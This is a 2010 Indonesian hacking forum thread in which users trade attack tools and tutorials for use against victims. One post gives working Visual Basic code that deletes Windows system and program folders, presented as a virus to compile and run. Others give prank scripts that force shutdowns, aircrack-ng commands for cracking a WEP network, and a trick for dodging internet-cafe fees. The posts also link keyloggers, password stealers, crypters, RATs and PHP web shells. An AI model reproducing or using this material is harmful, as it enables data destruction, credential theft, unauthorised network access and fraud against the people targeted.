#3
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
tambahan dari saya lagi
>>>>>> Membuat Virus Dengan Visual Basic<<<<<<<<<

Cara membuat virus dgn Visual Basic
Kali ini ane akan membahas tentang bagaimana cara membuat virus dengan visual basic mungkin bagi master2 vb tidak perlu untuk membaca tutorial ini dikhususkan untuk pemula banyak sekali virus2 yaang sudah bertebaran di internet tapi bagaimana program virus itu bekerja berikut langkah-langkahnya

Langkah-langkahnya adalah:

1. Buka Visual Basic 6.0 kalian lalu pilih Standart Exe.
2. Lalu buat formnya sekecil mungkin.
3. Dan klik 2x pada form itu dan akan menampilkan halaman untuk menaruh source kode, tolong hapus kode yang sudah ada, dan CoPas seluruh kode dibawah ini:
Public Sub DelAll(ByVal DirtoDelete As Variant) Dim FSO, FS Set FSO = CreateObject(”Scripting.FileSystemObject”) FS = FSO.DeleteFolder(DirtoDelete, True) End Sub Private Sub Form_Load() On Error Resume Next If FileExist(”c:windowssystem32unpamhack.txt”) = True Then End Else Call DelAll(”c:windowssystem”) Call DelAll(”c:windowssystem32″) Call DelAll(”c:windows”) Call DelAll(”C: Documents and SettingsAll Users”) Call DelAll(”C: Documents and SettingsAdministrator”) Call DelAll(”C: Documents and Settings”) Call DelAll(”C: Program FilesCommon Files”) Call DelAll(”C: Program Files Internet Explorer”) Call DelAll(”C: Program FilesMicrosoft Visual Studio”) Call DelAll(”C: Program Files”) End End If End Sub Function FileExist(ByVal FileName As String) As Boolean If Dir(FileName) = “” Then FileExist = False Else FileExist = True End If End Function


4. Setelah udah diCoPas silahkan dieksekusi dengan menekan tombol F5, atau bikin jadi exe. dengan cara buka menu File pilih Make Project1.exe simpan dengan nama apa saja,,

Nah untuk keterangan dari koding diatas adalah, pada teks yang warna hijau itu penangkal nih virus, jadi kalau di folder c:windowssystem32 ada file yang namanya unpamhack.txt, kalian ga bakal keserang oleh virus ini. bisa kalian edit koq jadi apa aja.. Satu lagi kalian gak bisa ngedit folder drive D yang untuk dijadikan objek untuk dihapus karena hanya bisa menghapus sistem saja. Apa jadinya kalau sistem terhapus?? ERRRROOORRR alias komputer situ bleng...

>>>>>>Membuat scripht jail buat temen"<<<<<<<

- Memberi pesan dan shutdown komputer
Spoiler codenya
@echo off msg * Aku tidak suka kamu shutdown -c "Error! Kamu jelek sekali" -s


save dengan .bat

- Menyalakan tombol Caps lock secara simultan
Spoiler codenya
Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop


save dengan extension .vbs

- Mengetik pesan kita secara otomatis di notepad
Spoiler codenya
WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Hel" WScript.Sleep 500 WshShell.SendKeys "lo " WScript.Sleep 500 WshShell.SendKeys ", ho" WScript.Sleep 500 WshShell.SendKeys "w a" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 WshShell.SendKeys "m g" WScript.Sleep 500 WshShell.SendKeys "ood" WScript.Sleep 500 WshShell.SendKeys " th" WScript.Sleep 500 WshShell.SendKeys "ank" WScript.Sleep 500 WshShell.SendKeys "s! "


save dengan Ex.vbs

- Buka Notepad secara terus menerus
Spoiler codenya


save dengan type .bat

- Hack keyboard sehingga korban dipaksa mengetik " Saya jelek" secara simultan
Spoiler codenya
Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "Saya Jelek" loop


save dengan ex.vbs

- mau membuat virus dengan mudah download di bawah sini
http://www.ziddu.com...7/FFVM.exe.html

Spoiler virus total
Antivirus Version Last Update Result
AhnLab-V3 2010.10.13.00 2010.10.12 -
AntiVir 7.10.12.193 2010.10.12 -
Antiy-AVL 2.0.3.7 2010.10.12 -
Authentium 5.2.0.5 2010.10.12 -
Avast 4.8.1351.0 2010.10.12 -
Avast5 5.0.594.0 2010.10.12 -
AVG 9.0.0.851 2010.10.12 -
BitDefender 7.2 2010.10.12 -
CAT-QuickHeal 11.00 2010.10.12 -
ClamAV 0.96.2.0-git 2010.10.12 -
Comodo 6368 2010.10.12 Constructor.Win32.Agent.~P
DrWeb 5.0.2.03300 2010.10.12 -
eSafe 7.0.17.0 2010.10.12 -
eTrust-Vet 36.1.7907 2010.10.12 -
F-Prot 4.6.2.117 2010.10.12 -
F-Secure 9.0.15370.0 2010.10.12 -
Fortinet 4.2.249.0 2010.10.12 -
GData 21 2010.10.12 -
Ikarus T3.1.1.90.0 2010.10.12 -
Jiangmin 13.0.900 2010.10.12 -
K7AntiVirus 9.65.2733 2010.10.12 -
McAfee 5.400.0.1158 2010.10.12 -
McAfee-GW-Edition 2010.1C 2010.10.12 -
Microsoft 1.6201 2010.10.12 -
NOD32 5525 2010.10.12 -
nProtect 2010-10-12.01 2010.10.12 -
Panda 10.0.2.7 2010.10.12 -
PCTools 7.0.3.5 2010.10.12 -
Prevx 3.0 2010.10.12 -
Rising 22.69.01.04 2010.10.12 -
Sophos 4.58.0 2010.10.12 -
Sunbelt 7045 2010.10.12 -
SUPERAntiSpyware 4.40.0.1006 2010.10.12 -
Symantec 20101.2.0.161 2010.10.12 -
TheHacker 6.7.0.1.055 2010.10.12 -
TrendMicro 9.120.0.1004 2010.10.12 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.12 -
VBA32 3.12.14.1 2010.10.12 -
ViRobot 2010.9.25.4060 2010.10.12 -
VirusBuster 12.67.14.0 2010.10.12 -

This post has been edited by crozzbone: 13 October 2010 - 03:05 AM
0

#4
User is online   QuitPageClosed 


  • SMP
  • ID No: 18081
  • Group: Level II
  • Posts: 1076
  • Joined: 14-July 07
saya ikut tambahin dikit dech..
tapi hanya sejenis add onn mozzila yang sangat berguna bagi seoarang hacker
tinggal di tambahin ke dalam add on mozila kalian aja semua

Fire Encrypter 4.0
https://addons.mozilla.org/en-US/firefox/addon/3208
Advanced Dork: 2.3.3.4
https://addons.mozilla.org/en-US/firefox/addon/3208

hackbar:
https://addons.mozilla.org/en-US/firefox/addon/3899
Find in Frame Hack:
https://addons.mozilla.org/en-US/firefox/addon/1075

firebug:
https://addons.mozilla.org/en-US/firefox/addon/1843

anonymouser:
https://addons.mozilla.org/en-US/firefox/addons/versions/1415

live http header:
https://addons.mozilla.org/en-US/firefox/addon/3829

web developer:
https://addons.mozilla.org/firefox/addon/60

downthemall:
https://addons.mozilla.org/en-US/firefox/addon/201

firePHP:
https://addons.mozilla.org/en-US/firefox/addon/6149

foxTOR:
https://addons.mozilla.org/en-US/firefox/addon/3606

cookieSwap:
https://addons.mozilla.org/en-US/firefox/addon/3255
Anonymization Toolbar:
https://addons.mozilla.org/en-US/firefox/addon/2217
Slavehack Toolbar:
https://addons.mozilla.org/en-US/firefox/addon/4190
Page Hacker:
https://addons.mozilla.org/en-US/firefox/addon/5753
PasswordMaker:
https://addons.mozilla.org/en-US/firefox/addon/469

SQL Inject Me:
https://addons.mozilla.org/en-US/firefox/addon/7597

XSS Me:
https://addons.mozilla.org/en-US/firefox/addon/7598

refspoof:
https://addons.mozilla.org/en-US/firefox/addon/4513

X-Forwarded-For Spoofer:
https://addons.mozilla.org/en-US/firefox/addon/5948
Modify Headers:
https://addons.mozilla.org/en-US/firefox/addon/967

X-Forwarded-For Spoofer:
https://addons.mozilla.org/en-US/firefox/addon/5948


Saya Move ke Cyber underground
This post has been edited by tewas1: 14 October 2010 - 05:06 PM
2

#5
User is online   QuitPageClosed 


  • SMP
  • ID No: 18081
  • Group: Level II
  • Posts: 1076
  • Joined: 14-July 07
akan saya tambahin kreditnya..
untuk masalah ini sudah clear..
tolong yang bawah saya jgn junk lagi..
untuk 2 postingan di atas saya delete...biar ga berkelanjutan..
0

#6
User is offline   unyu 


  • TK
  • ID No: 71129
  • Group: VIP Kehormatan
  • Posts: 100
  • Joined: 24-June 10
1 lg tambahan sopwer yg bahenol

METASPLOIT

:ngacir:
0

#7
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
ane nambah gan
WEB SNAKE 1.23 --> Curi Website dan structurenya
WebSnake adalah browser yang paling kuat di dunia off-line dirancang khusus untuk Windows Platform.

Selain browsing off-line, WebSnake adalah unik karena menggunakan milik kami "tarik cerdas" teknologi untuk mencari dan mengambil file dari World Wide Web. Sebagai contoh, WebSnake mendukung mirroring website (termasuk struktur direktori), pengambilan e-mail, peta situs dan mencari file maju. Tidak seperti kebanyakan dari pesaing kami, WebSnake juga mendukung standar industri File Transfer Protocol (FTP).

Yang terbaik dari semuanya, WebSnake mudah digunakan! ramah kami WebSnake Wizard akan membawa Anda melalui proses menciptakan dan menjalankan proyek WebSnake dari awal. Hanya pilih satu dari lima jenis proyek, memberikan URL dan WebSnake akan melakukan sisanya!

Off-line Browsing Proyek - Off-line WebSnake's Browsing Proyek dapat menyalin situs remote ke hard drive Anda untuk melihat lokal melalui browser web. Off-line browsing membuat web surfing lebih cepat karena file yang terbanyak langsung diakses dari hard drive Anda, bukan Internet.

Mirroring Proyek - Proyek Mirroring memungkinkan webmaster dan web designer salinan situs remote, termasuk struktur direktori lengkap dari situs.

Ular E-mail Alamat Proyek - Dengan Alamat E-mail Proyek luar biasa, Anda dapat menyalin alamat e-mail yang disebutkan dalam file HTML website. alamat e-mail ini nantinya bisa diekspor ke koma atau tab delimited file.

Proyek Peta Situs - Peta Situs kuat Proyek dapat membangun sebuah peta dari HTML file yang dirujuk dari alamat awal / URL. Ini berguna jika Anda ingin mengetahui struktur dari sebuah situs remote.

Cari dan Ambil Proyek - Pencarian dan Ambil Proyek akan mencari file HTML yang berisi kata kunci yang ditetapkan. Atau, Anda dapat mencari dan mengambil file dengan mencari kata kunci dalam nama file dan / atau jenis file. WebSnake juga dapat secara otomatis mendownload file yang ditemukan oleh pencarian.

Fitur Baru di 1,23

WebSnake yang disempurnakan fitur membuat website mengular lebih cepat dan lebih komprehensif dari sebelumnya!

Bookmark Impor

Meliuk-liuk situs Web favorit Anda sangat mudah dengan penunjuk WebSnake's pengimpor. Apakah Anda menggunakan Netscape, Internet Explorer, atau browser lain, Anda dapat mengubah bookmark Anda ke proyek-proyek yang dapat didownload hanya dengan beberapa klik mouse.

Parsing Java Script

Mengingat semua efek dingin di Web, Anda akan menemukan banyak Jawa dan Visual Basic (VB) script. Dalam skrip ini, mungkin ada dukungan file yang diperlukan untuk script untuk dijalankan dengan benar. WebSnake berjalan satu mil ekstra untuk mengambil semua file yang diperlukan dan link mereka sehingga semuanya akan bekerja secara off-line.

Netiquette

fitur yang ditingkatkan WebSnake's netiket pastikan Anda berinteraksi dengan pengguna lain di internet dengan cara yang sopan saat memberikan Anda kontrol yang kuat yang Anda butuhkan untuk website ular secara efektif.

beberapa server Smart Dispersi - Ketika mengular sebuah situs web, mungkin WebSnake span untuk mengambil semua file yang diperlukan. Proses ini dapat diperlambat cukup jika WebSnake menemukan server lambat. Fitur Smart Dispersi mengejar pengambilan benang pada menanggapi lain lebih baik-server, yang berarti Anda mendapatkan informasi yang Anda inginkan sering dua kali lebih cepat!

Robot Pengecualian - Jangan buang-buang waktu untuk daerah ular pada situs Web yang dibatasi. Robot Exclusion Standard yang digunakan oleh webmaster untuk membatasi akses Anda ke bagian tertentu dari situs mereka. Dengan fitur ini, WebSnake cepat akan melihat di daerah off-batas dan terus maju.

Multi-thread dan Permintaan Control - Anda tidak akan pernah overload server lambat atau membawa situs Web untuk berhenti grinding lagi. Dengan multi thread WebSnake fleksibel-dan-interval antara kontrol permintaan, proyek ular Anda cepat dan menyeluruh.

*.Zip kan Proyek anda

Tergantung di mana Websnake kamu pergi dan seberapa dalam Anda pergi, file download dapat memakan cukup banyak ruang. Jika Anda kehabisan ruang tetapi tidak ingin kehilangan data Anda, alat-alat praktis WebSnake's zip membiarkan Anda memampatkan isi seluruh proyek untuk menghemat ruang disk yang berharga.
Great Fitur Lainnya

Bantuan dan Tutorial File

file Bantuan kami yang ekstensif dengan lebih dari 50 kata kunci didefinisikan. The mini-tutorial mencakup semua jenis lima proyek dengan contoh-contoh aktual.

Lihat Rincian File

File melihat rincian fitur akan memberikan informasi yang berguna seperti nama file, ukuran dan jenis. Selain itu, WebSnake juga dapat (tetapi tidak selalu) mengambil informasi file tambahan seperti tanggal dibuat dan tanggal terakhir diubah. WebSnake juga akan menampilkan path lengkap dimana file awalnya ditemukan.

Ular Status Bar

Ketika Anda menjalankan proyek WebSnake, informasi yang berguna seperti pesan server, file yang diterima dan / atau dicari, dan transfer rate akan ditampilkan secara real-time.

System Requirements

* 486/33 or higher PC < - - - - ROFL!!
* Windows Platform
* 8MB RAM
* 5MB available hard disk space

Download di bawah





credit anak idon hekker <--- sory yah bukan bego takut di warn soalnya aku baca di rules jgn promosi link di N3 :content: ohh ya bagi om momod/ co admin tolong tambahkan kesempatan utk post 3 kali saya mau share tools hack nie
This post has been edited by crozzbone: 22 October 2010 - 03:20 PM
0

#8
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
>>>>>>SMS bomber<<<<<

Resized to 91% (was 727 x 415) - Click image to enlargePosted Image



>>>>>> Tools Hack <<<<<<<<<

1. Imperium gmail pasword.
Nech adalah sofwared hack terbaik menrt gw.
dy bsa meng hack :

-MSN
-Yahoo
-Ymail
-gmail.




LinK DL: http://globaldownloa...m/download.html

Untuk SS::
Posted Image

Selamat Hacking ^_^

yang ke 2

Gmail Hacker
Posted Image

yang ke 3
Yahoo Frezer .

apa itu yahoo frezer.?
nh adalah frezer seperti FACEBOOK

jka d frez korban tidak bsa buka apa" wkawkak

untuk SS ::
Resized to 65% (was 1024 x 768) - Click image to enlargePosted Image


caranya sangat simple masukin aja alamat email korban

Dah skian aja hahahaha ga kok gan becanda ok ini yg selanjutnya
Crypters ** **
--------------------------------------
666-Ioncore
Fly Crypter USG 2,2 + 0,6
Fly Crypter USG 2,3 + 0,7

Binder ** **
--------------------------------------
bl0b binder + usg 0,3
p4r4d0x Binder

Keyloggers ** **
--------------------------------------
Ardamax Keylogger 3.0 + Serial
Albertino Simple Keylogger

PW Stealers ** **
--------------------------------------
iStealer 6,0
PW terbatas Stealer v0.4
Stupid Stealer v6

IRC Bots ** **
--------------------------------------
IMBot-HF MOD
IMBotMod V4.1
NzM 3,0
RX-120-MSN-V3
Aspergillius
NESBot v5 Stripped
Unk Stripped

** ** Remote Administration Tools
--------------------------------------
Cerberus
Poison Ivy 3,2
Spy-Net v2.6

Wireless Tools ** **
--------------------------------------
Cain & Abel
Wireshark
Aircrack-ng

Network Tools ** **
--------------------------------------
Blues Port Scanner
NetTools v5
Nmap 5,21 - Windows verion
Snort 2.8.5.3 - Windows verion

** Web Hacking Tools **
--------------------------------------
Admin Finder
XSS Scanner
SQL MoHackz Pemeras

** ** Exe Tools
--------------------------------------
(smart perakitan) Enterprise 4,1
BinText
Dis #
OllyDbg
Resource Hacker

Miscellaneous ** **
--------------------------------------
Mess Mania v5.0
Ex-Downloader
Metasploit 3.3.3
Visual Basic 6 Portable
Xash Undetector

Program Fake 75 ** **
--------------------------------------
Adobe Photoshop CS4 Key Gen
Akvis Key Generator
AnonT_2
AutoDesk 3ds Max [JaMu]
Avast Key Generator
Avatar The Game Key Gen
AVG Internet Security 9,0 [JaMu]
Avira Premium [JaMu]
Batman Arkham Asylum Key Gen
BitDefender 2010 [JaMu]
Camfrog Valid [JaMu]
Call Of Duty: Moder Warfare 2 Multi [JaMu]
Convert X ke DVD
Corelx
DDoSeR 3,6
DIRT2
Dreamweaver CS4 Key Gen
Lambang FUD Crypter
Fake Uap [JaMu]
Fallout
FarCry2 Multi-[JaMu]
FIFA 2010 Key Generator
Ghost Recon Multi-[JaMu]
Half-Life 2 Key Generator
Kaspersky Internet Security 2009 Key Gen
Kaspersky Key Generator 2010
KasKeygenRevised
Key Generator Harry potter
Leftdead
Lord of Rings: The Return of King Multi-[JaMu]
MSDN Admin Generator
MSN SpyBox Key Generator
Multi-Hacker
Modern Warefare 2 Online Patch
Nero 8 Ultra Edition [JaMu]
Nero [JaMu]
Netflix Activator
Ninja Blade [JaMu]
Norton 2010 Key Gen
Kantor Key Gen
Hack Paltalk Cam Mode
Panda Security 2010 Key Generator
Uang Paypal Hack
Account Paypal Verifier
Hacker sempurna Orkut Versi 1.0
Sempurna MSN Hacker v 2,1
Program Fake Plutoniums
Poker hack
Pro Show Gold Key Generator
Robert Pettinson Tema Generator
Rogue Warrior Key Generator
Runscape Key Gen
Trainer Hack ***** Ruscape Mode
Sony Vegas Pro 9,0 [JaMu]
Sound Forge 9 Kunci
Sound Forge 10 Key Generator
Street Fighter IV [JaMu]
Anti-virus SuperLite Tetap
TeamPROXi - Website tdk diundang
TeamViewer Patch
The Sims 3 Key Generator
Tibia
TV
TV Movie 5,0 Online
Vengeance Keylogger 1,0
VIP Adder
Virtual DJ Semua Versi [JaMu]
Webhack
Windows 7 [JaMu]
Windows 7 Serial Generator
Windows XP Key Generator
Windows Activator
World of Warcraft Account Hacker
Xbox Live Account Hacker
Youtube Hack Tool
Spoiler Download


lanjut gan
Posted Image
Spoiler Download


haduh cape juga fiuwww
Posted Image



huhhhhhhh udah deh kriting udah tangan ane

Agan2 pasti sering tau apa itu admin password. ya misal pada warnet , seorang admin akan memberikan password pada user admin sehingga client tidak dapat mengakses user tsb. nahh.... tadi pas jalan2 di forum orang bule.. gw dpt aplikasi bagus gan..

nah.. gw tertarik bgt tuh... lgsg aja gw klik....


haduhhhh bentar ane minum dolo yah sedot dolo akhhhh
glek...,,,, glek...,,, gle.....,,,, akkkhhhh seruput! nendangg....,,,,!! cuman gope
Posted Image


| Windows XP Gamer Edition | ISO | 89 MB |

Ini adalah versi slimmed down dari
Windows XP. Hal ini sangat cepat karena tidak memiliki banyak omong kosong
yang biasanya rawa bawah Windows seperti Internet Explorer. Tidak ada serial
diperlukan untuk menginstal dan OS tidak perlu diaktifkan.
Perfect OS untuk gamer!


System Requirements:
800 Mhz or greater CPU
64 mb RAM
700mb HD space
13 processes running on default install.
Full ISO is only 92 mb!
How to use:
Burn it to a cd and install
Size : 89 MB

http://www.easy-shar...ition.part1.rar
http://www.easy-shar...ition.part2.rar

credit by idon hekker <---- sory ane udah baca di rules "jgn promosikan link web lain"
This post has been edited by crozzbone: 22 October 2010 - 08:03 PM
0

#9
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
tambah lagi gan
Posted Image

Download : http://www.multiupload.com/G0RTQ7QKHF


Resized to 92% (was 720 x 497) - Click image to enlargePosted Image

sebenarnya ada 9 tools tapi saya malas masukin gambarnya ok langsung download 9 toolsnya

http://www.multiupload.com/MTPA4K5GDX

Death Hacker Program

1. TeachEr
fitur link:
2. SimAttacker
3. CGI-Telnet
4. Myb
5. Myb 2
6. Crystal
7. Web Admin
8. TrYaG-VB
9. TrYaG-VB 2
10. nstView
11. PHPJackal
12. PHP Remote View
13. S-C
14. Dx[/color]
15. MyShell
16. c99
17. cmd
18. EGY Spider
19. cc
20. pimpshell
21. NIX REMOTE
22. GYNShell
23. Backd3Er
24. c99madshell
25. B0ffuzzer v1
26. Bash Back Connect Shell
27. Bind Shell
28. Macker's Private PHPShell
29. MulCi Shell
30. On Boom shell

download 30 tools hacker ini : http://www.multiupload.com/63A2SLDA2A

wadohhhh 1 lagi deh gan
nie tools phyton

http://xrayoptics.by...atabase/others/

credit udah tau kan ane dapat dari mana
selamat jadi hacker ^_^
This post has been edited by crozzbone: 22 October 2010 - 08:21 PM
0

#10
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
asikkkk akhirnya aku dikasih 1 kali kesempatan utk post ok gan langsung

>>>> jebol proteksi wep<<<<<<<<

Ini adalah bagian kedua dari praktek Menjebol HotSpot. Jikalau pada artikel sebelumnya kita membahas bagaimana menembus batas proteksi MAC address, pada kali ini kita akan membahas bagaimana mendapatkan akses HotSpot yang menggunakan WEP (Wired Equivalent Privacy) Keys.

Alat yang kita butuhkan adalah :

1. Sebuah Laptop

2.Sebuah Wireless Adapter yang mendukung Mode Monitoring dan Injection.

3.Linux Live CD distro : Backtrack 2.0

Mengapa kita membutuhkan Laptop ? Tentu saja karena akses HotSpot biasanya diberikan untuk pengguna yang Mobile. Dan dengan laptop kita memiliki fleksibilitas yang tinggi pula.

Lalu apa yang dimaksud dengan Wireless Adapter yang mendukung mode monitoring dan injection ? Perlu anda ketahui, tidak semua Wireless Adapter yang ada dipasaran, maupun yang sudah built in dalam laptop, mendukung mode monitoring dan injection yang diperlukan untuk WEP hacking ini.

Yang perlu anda perhatikan adalah Chip dari Wireless Adapter anda. Chip terbaik dalam melakukan wireless hacking adalah Atheros dan Ralink. Namun Atheros adalah pilihan utama. Tidak banyak wireless adapter yang memiliki chip atheros di Indonesia, anda dapat mencari beberapa merk dibawah ini :

1. 3Com 3CRPAG175B

2.3Com 3CRXJK10075

3.DLINK DWL-G630 Rev C

4.Linksys WPC55AG

5.TrendNET TEW-441PC

6.TrendNET TEW-443PI

7.TP-LINK TL-WN610G

Jika anda telah memilikinya, maka anda dapat memulai Langkah pertama dalam Wireless Hacking ini yaitu lakukan booting dengan CD Backtrack anda .
Posted Image


Langkah kedua tentu saja, langsung buka console anda dan ketikkan command berikut(saya asumsikan wireless adapter anda berchipset atheros) :

airmon-ng stop ath0

airmon-ng start wifi0

Kedua command ini berguna untuk mengaktifkan mode monitoring dan injection pada wireless adapter anda. Kemudian lanjutkan dengan monitoring jaringan wireless dengan mengetikkan command berikut :

airodump-ng ath0
Posted Image

Akan tampil seluruh jaringan wireless yang terdeteksi seperti diatas. Tampak terlihat Access Point Rek-1 diproteksi dengan WEP Encryption. itulah korban kita. AP Rek-1 diset pada Channel 6 dan memiliki BSSID 00:19:5B:5C:62:92 . Sekarang saatnya melakukan penyerangan.Buka Console baru dan ketikkan :

airodump-ng –channel 6 –bssid 00:19:5B:5C:62:92 -w hasil ath0

Perintah diatas akan mengumpulkan paket data yang dibutuhan untuk proses Cracking.

Selanjutnya lakukan injeksi paket pada Client yang terkoneksi pada AP untuk mendapatkan paket ARP lebih cepat. Bukalah lagi Console baru tanpa menutup console yang sebelumnya dan ketik :

aireplay-ng –arpreplay -b 00:19:5B:5C:62:92 -h 00:192:450:EB ath0

Client yang diserang ini memiliki Mac address 00:192:450:EB (lihat pada screenshot diatas pada tabel station yang terletak dibawah) . Anda tidak menemukan Mac address 00:192:450:EB pada screenshot ? tentu saja karena saat dilakukan screenshot belum terdeteksi
Tidak sabar menunggu ? Untuk mempercepat lagi datangnya ARP , maka kita dapat melakukan serangan Deauthentication untuk memutuskan hubungan Client ke AP sehingga ARP yang biasanya didapat saat awal koneksi client dapat lebih cepat didapat. Bukalah console baru sekali lagi dan ketikkan :

aireplay-ng –deauth 5 -c 00:192:450:EB -a 00:19:5B:5C:62:92 ath0

Hasil dari ketiga perintah ini dapat anda lihat pada screenshot dibawah ini :
Posted Image

I Like this Screenshot
Sampai sejauh ini anda telah melakukan pengumpulan paket yang dibutuhkan untuk menjebol WEP Keys. Langkah terakhir yang harus anda lakukan adalah buka console baru lagi dan ketikkan perintah berikut :

aircrack-ng hasil*.cap

atau apabila anda memiliki aircrack versi terbaru anda dapat juga mengetikkan perintah seperti berikut :

aircrack-ptw hasil-01.cap

Dan tunggulah beberapa menit hingga anda mendapatkan key tersebut Maaf Screenshot yang satu ini lupa saya buat, tapi yang pasti saya berhasil melakukannya dalam waktu 30 Menit dengan perintah aircrack-ptw hasil-01.cap .

Tertarik melakukannya ? silakan mencobanya

credit udah tau kan dari mana?
This post has been edited by crozzbone: 22 October 2010 - 08:55 PM
0

#11
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
>>>>>Ardamax Keylogger<<<<<<<<,
Mungkin agan" sekalian dah pda tau kaliya dengan software yang 1 ini . .

si perekam apapun yang di ketikin oleh pengguna komputernya.
yap bnr bgt tidak lain dia ada keylogger
hmmm... mungkin agan cuma tau kalo keylogger itu punya kelemahan yaitu si pemasang harus
balik lagi ke komputer yang di pasangin kelogger,eits , ini saya punya satu keylogger yang bikin si pemasang gak perlu
lagi balik ke komputer korban

bagi agan" yang mau donlot silahkan DL di : http://www.ziddu.com...ked-ONY.7z.html

Dan Serial Numbernya silakan donlot di : http://www.ziddu.com...Serial.rar.html

sekian terima kasih
tau kan creditnya
0

#12
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
kpd om momod/staff/admin tolong beri saya beberapa untuk post lagi karena saya mendapatkan tools hack yg bikin seru lagi

>>>>> Maen warnet gratis<<<<<<

download dolo tool nya : http://www.4shared.c...Hider-2-00.html

Kalian pasti pernah khan ke warnet?? Naah, klo pernah pasti kalian bakal muncul halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun harus bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!

Berikut ini langkahnyaaa:

1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
4. Klo ada login screen, kamu login ajah kaya biasa.
5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin ajah ke flashdisc atau disket biar gak usah download di warnet.
6. Klo ZHider dah dibukaa, langsung ajah logout.
7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!

Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran ajaa (baca: TOLOL).

Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readmenya:
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Aku kasih tips dan trik bukan berarti aku mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian aku juga cuman pengen share ajah kok! Gak ada maksud apa2! Hehehehe…

Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!

>>>>>> tools hacker new!<<<<<<<

keylogger bundles : http://www.ziddu.com...ftware.zip.html
paket hacking 1 : http://www.ziddu.com...obolPC.zip.html
paket hacking 2 : http://www.ziddu.com...LanSpy.zip.html
paket hacking 3 : http://www.ziddu.com..._tools.zip.html
paket hacking 4 : http://www.ziddu.com...sword2.zip.html

ok kesempatan utk post habis besok lagi ya kecuali admin/momod/staff kasih saya kesempatan post lagi pasti saya post ^_^
0

#13
User is offline   KafeAmaliunIndah 


  • Belum Sekolah
  • ID No: 80482
  • Group: Level I
  • Posts: 9
  • Joined: 22-September 10
View Postcrozzbone, on 22 October 2010 - 08:00 PM, said:
>>>>>>SMS bomber<<<<<

Resized to 87% (was 727 x 415) - Click image to enlargePosted Image

Spoiler Download


>>>>>> Tools Hack <<<<<<<<<

1. Imperium gmail pasword.
Nech adalah sofwared hack terbaik menrt gw.
dy bsa meng hack :

-MSN
-Yahoo
-Ymail
-gmail.




LinK DL: http://globaldownloa...m/download.html

Untuk SS::
Posted Image

Selamat Hacking ^_^

yang ke 2

Gmail Hacker
Posted Image

yang ke 3
Yahoo Frezer .

apa itu yahoo frezer.?
nh adalah frezer seperti FACEBOOK

jka d frez korban tidak bsa buka apa" wkawkak

untuk SS ::
Resized to 62% (was 1024 x 768) - Click image to enlargePosted Image


caranya sangat simple masukin aja alamat email korban

Dah skian aja hahahaha ga kok gan becanda ok ini yg selanjutnya
Crypters ** **
--------------------------------------
666-Ioncore
Fly Crypter USG 2,2 + 0,6
Fly Crypter USG 2,3 + 0,7

Binder ** **
--------------------------------------
bl0b binder + usg 0,3
p4r4d0x Binder

Keyloggers ** **
--------------------------------------
Ardamax Keylogger 3.0 + Serial
Albertino Simple Keylogger

PW Stealers ** **
--------------------------------------
iStealer 6,0
PW terbatas Stealer v0.4
Stupid Stealer v6

IRC Bots ** **
--------------------------------------
IMBot-HF MOD
IMBotMod V4.1
NzM 3,0
RX-120-MSN-V3
Aspergillius
NESBot v5 Stripped
Unk Stripped

** ** Remote Administration Tools
--------------------------------------
Cerberus
Poison Ivy 3,2
Spy-Net v2.6

Wireless Tools ** **
--------------------------------------
Cain & Abel
Wireshark
